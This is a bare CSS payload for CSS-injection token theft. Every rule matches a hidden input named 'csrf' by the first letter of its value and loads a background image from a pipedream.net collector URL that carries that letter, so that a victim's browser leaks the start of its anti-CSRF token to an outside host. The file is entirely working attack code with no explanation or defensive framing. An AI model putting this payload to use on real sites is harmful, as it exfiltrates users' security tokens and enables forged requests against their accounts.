input[name="csrf"][value^="a"]{background: url(https://eogce8tgujfgk5f.m.pipedream.net/?code=a); }
input[name="csrf"][value^="b"]{background: url(https://eogce8tgujfgk5f.m.pipedream.net/?code=b); }
input[name="csrf"][value^="c"]{background: url(https://eogce8tgujfgk5f.m.pipedream.net/?code=c); }
input[name="csrf"][value^="d"]{background: url(https://eogce8tgujfgk5f.m.pipedream.net/?code=d); }
input[name="csrf"][value^="e"]{background: url(https://eogce8tgujfgk5f.m.pipedream.net/?code=e); }
input[name="csrf"][value^="f"]{background: url(https://eogce8tgujfgk5f.m.pipedream.net/?code=f); }
input[name="csrf"][value^="g"]{background: url(https://eogce8tgujfgk5f.m.pipedream.net/?code=g); }
input[name="csrf"][value^="h"]{background: url(https://eogce8tgujfgk5f.m.pipedream.net/?code=h); }
input[name="csrf"][value^="i"]{background: url(https://eogce8tgujfgk5f.m.pipedream.net/?code=i); }
input[name="csrf"][value^="j"]{background: url(https://eogce8tgujfgk5f.m.pipedream.net/?code=j); }
input[name="csrf"][value^="k"]{background: url(https://eogce8tgujfgk5f.m.pipedream.net/?code=k); }
input[name="csrf"][value^="l"]{background: url(https://eogce8tgujfgk5f.m.pipedream.net/?code=l); }
input[name="csrf"][value^="m"]{background: url(https://eogce8tgujfgk5f.m.pipedream.net/?code=m); }
input[name="csrf"][value^="n"]{background: url(https://eogce8tgujfgk5f.m.pipedream.net/?code=n); }
input[name="csrf"][value^="o"]{background: url(https://eogce8tgujfgk5f.m.pipedream.net/?code=o); }
input[name="csrf"][value^="p"]{background: url(https://eogce8tgujfgk5f.m.pipedream.net/?code=p); }
input[name="csrf"][value^="q"]{background: url(https://eogce8tgujfgk5f.m.pipedream.net/?code=q); }
input[name="csrf"][value^="r"]{background: url(https://eogce8tgujfgk5f.m.pipedream.net/?code=r); }
input[name="csrf"][value^="s"]{background: url(https://eogce8tgujfgk5f.m.pipedream.net/?code=s); }
input[name="csrf"][value^="t"]{background: url(https://eogce8tgujfgk5f.m.pipedream.net/?code=t); }
input[name="csrf"][value^="u"]{background: url(https://eogce8tgujfgk5f.m.pipedream.net/?code=u); }
input[name="csrf"][value^="v"]{background: url(https://eogce8tgujfgk5f.m.pipedream.net/?code=v); }
input[name="csrf"][value^="x"]{background: url(https://eogce8tgujfgk5f.m.pipedream.net/?code=x); }
input[name="csrf"][value^="y"]{background: url(https://eogce8tgujfgk5f.m.pipedream.net/?code=y); }
input[name="csrf"][value^="z"]{background: url(https://eogce8tgujfgk5f.m.pipedream.net/?code=z); }
